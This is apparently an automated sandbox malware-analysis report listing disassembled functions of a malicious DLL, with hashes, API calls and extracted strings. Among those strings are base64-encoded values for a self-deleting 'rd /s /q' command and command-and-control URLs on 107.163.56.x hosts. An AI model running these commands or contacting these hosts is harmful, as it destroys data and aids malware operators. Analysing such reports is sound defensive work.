                                                                                                                                                                          • Source File: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: 7$SK$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-3701087130
                                                                                                                                                                          • Opcode ID: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
                                                                                                                                                                          • Instruction ID: 71c666905a5763b167ab1a21182f42240e287b7e11d47a96cc59b11d17f26c76
                                                                                                                                                                          • Opcode Fuzzy Hash: fd8cb615bc2a7434289248c0f4e9c720ce73c8ad7ac403d798c885ad5689031d
                                                                                                                                                                          • Instruction Fuzzy Hash: 4731F571408284AED712EB10DC8669E7FA6EF84385F50886DFAC85B112C770A9A49B53
                                                                                                                                                                          Function 1000858A Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 83sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep$wsprintf
                                                                                                                                                                          • String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log
                                                                                                                                                                          • API String ID: 3195947292-1533272838
                                                                                                                                                                          • Opcode ID: d95f3378c41756f6a762341336361093e5ac87cac163c94da78467b986173758
                                                                                                                                                                          • Instruction ID: acd8b216c9490be150f41627fddde4231ced29d76843988cf1697fe551d5a772
                                                                                                                                                                          • Opcode Fuzzy Hash: d95f3378c41756f6a762341336361093e5ac87cac163c94da78467b986173758
                                                                                                                                                                          • Instruction Fuzzy Hash: 0D21A17680021CBAEB11DBE48C85EDFBB7DEF08390F140466F604B6141EA756A858BA1
                                                                                                                                                                          Function 100062F3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: strcspn$FormatTime___crt
                                                                                                                                                                          • String ID: http://
                                                                                                                                                                          • API String ID: 4006067733-1121587658
                                                                                                                                                                          • Opcode ID: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
                                                                                                                                                                          • Instruction ID: 5e5274a5df46717633dbefa534eebea5f36de8a9ab4d0e8209e5c86ee6f0ed2e
                                                                                                                                                                          • Opcode Fuzzy Hash: a0416022ebacc6e770f8a5490d80555b2289548172b231cb014c820514a50a33
                                                                                                                                                                          • Instruction Fuzzy Hash: 6541457690421CBAEF11DBB4DC85FDE77BCDF08394F5004A6F608E6082DA75AF458AA1
                                                                                                                                                                          Function 10004642 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 102libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunkwsprintf
                                                                                                                                                                          • String ID: %s\%s$.$\*.*
                                                                                                                                                                          • API String ID: 2324811901-2210278135
                                                                                                                                                                          • Opcode ID: dd3fcc65249f11e8904a4ab8c1888655046cb056fe9947afd47f24fcef0f6234
                                                                                                                                                                          • Instruction ID: 788f7299f4ef3f0d15df8f53932c811205ff60b6d2b73f04fca062f583e9a503
                                                                                                                                                                          • Opcode Fuzzy Hash: dd3fcc65249f11e8904a4ab8c1888655046cb056fe9947afd47f24fcef0f6234
                                                                                                                                                                          • Instruction Fuzzy Hash: 59316FB6C0025CBEEF12DBA4CD46ECEBB79EF04380F1005E6F618A6051DB719B989B50
                                                                                                                                                                          Function 10006A91 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65sleepthreadCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B73,00000000,00000000,?,?,00000202,?), ref: 10003EDA
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 10006ACB
                                                                                                                                                                            • Part of subcall function 100064AB: wsprintfA.USER32 ref: 10006509
                                                                                                                                                                            • Part of subcall function 100064AB: ___crtGetTimeFormatEx.LIBCMT ref: 10006558
                                                                                                                                                                          • Sleep.KERNEL32(0002BF20), ref: 10006B00
                                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,10006890,00000000,00000000,00000000), ref: 10006B14
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
                                                                                                                                                                          • String ID: 0x5d65r455f$5762479093
                                                                                                                                                                          • API String ID: 3244495550-2446933972
                                                                                                                                                                          • Opcode ID: 098fb097950a8334b99444067af34f82727cb7eae555cd9c55e54146a267457d
                                                                                                                                                                          • Instruction ID: 4f67e99d50a46098441a250a8f858ff8eaba0e926cf0b864be99c43c72b3ca27
                                                                                                                                                                          • Opcode Fuzzy Hash: 098fb097950a8334b99444067af34f82727cb7eae555cd9c55e54146a267457d
                                                                                                                                                                          • Instruction Fuzzy Hash: F7014CB69443587AF210E3716CC6DFB3A4CDF953E0F240535FA15950CBDA24AC1581B2
                                                                                                                                                                          Function 1000C3BD Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 466COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: /$UT
                                                                                                                                                                          • API String ID: 0-1626504983
                                                                                                                                                                          • Opcode ID: 5142cfb9ccdefaa470c2d1bc490259d978050ac394f4ff847b15abec65c939ee
                                                                                                                                                                          • Instruction ID: d03cd593b305998a047facd2d6d5b23892ca1700a5cf5fa6db110c2fb33c411d
                                                                                                                                                                          • Opcode Fuzzy Hash: 5142cfb9ccdefaa470c2d1bc490259d978050ac394f4ff847b15abec65c939ee
                                                                                                                                                                          • Instruction Fuzzy Hash: B902B075A0478D9BEB21CF64C884F9EBBF9EF04380F1044AEE44997246DB70AA84CB55
                                                                                                                                                                          Function 10004139 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 130libraryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID: %s%s$cmd.exe$log.txt
                                                                                                                                                                          • API String ID: 2994545307-357432712
                                                                                                                                                                          • Opcode ID: c662d985e3386c195addf9fc87fc80f2d8a6c609c617a7323f38e5e295425b2d
                                                                                                                                                                          • Instruction ID: 42687b898050392b2aa34869ec4325c4612b7f7ca25810209864e9fbe1877dbd
                                                                                                                                                                          • Opcode Fuzzy Hash: c662d985e3386c195addf9fc87fc80f2d8a6c609c617a7323f38e5e295425b2d
                                                                                                                                                                          • Instruction Fuzzy Hash: A841DAB690435CBEEB11DAA4CC85EDF77ACEF04384F1045A6F708E7091DA34AE848B60
                                                                                                                                                                          Function 10005D09 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 70timeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$http://$search
                                                                                                                                                                          • API String ID: 1721638100-482061809
                                                                                                                                                                          • Opcode ID: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
                                                                                                                                                                          • Instruction ID: 870dc5a9e8937f5dec60cb765e1a8b9b6c263c42da1418f367658ae9c7f1e2c5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8e46dae448c166898a377d8e58f34a63fab9a8fdb354c69680971baf7c4745fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 491106769081197BFB61DAA4CC42FDB776CDB043D5F0045B2FB44A5091EA72EFC48660
                                                                                                                                                                          Function 100080A9 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 117sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleep
                                                                                                                                                                          • String ID: 107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$P
                                                                                                                                                                          • API String ID: 3472027048-2873435839
                                                                                                                                                                          • Opcode ID: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction ID: 06cf6e753789beb41ee34e7b66c8b6e5b7de97640241e5e5236da3cdb21958a2
                                                                                                                                                                          • Opcode Fuzzy Hash: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
                                                                                                                                                                          • Instruction Fuzzy Hash: 2831867790425D6EEB11D7B4DC41BDA7B7CFF18350F5404E6E248E6182EB719B988B10
                                                                                                                                                                          Function 1002B195 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59sleepCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10008847
                                                                                                                                                                          • Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
                                                                                                                                                                          Strings
                                                                                                                                                                          • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
                                                                                                                                                                          • SeDebugPrivilege, xrefs: 10034413
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Sleepwsprintf
                                                                                                                                                                          • String ID: SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                                                          • API String ID: 1749205058-3347928522
                                                                                                                                                                          • Opcode ID: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction ID: eef6782f7c8bf8d562aff317d79cc2e303554eab770f54d6d404826304d9c596
                                                                                                                                                                          • Opcode Fuzzy Hash: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
                                                                                                                                                                          • Instruction Fuzzy Hash: C611E3B4004245BFE702DF10DC81AAE7BA8FF44384F40886DF6856A241CBB1AAD48B56
                                                                                                                                                                          Function 10007A85 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
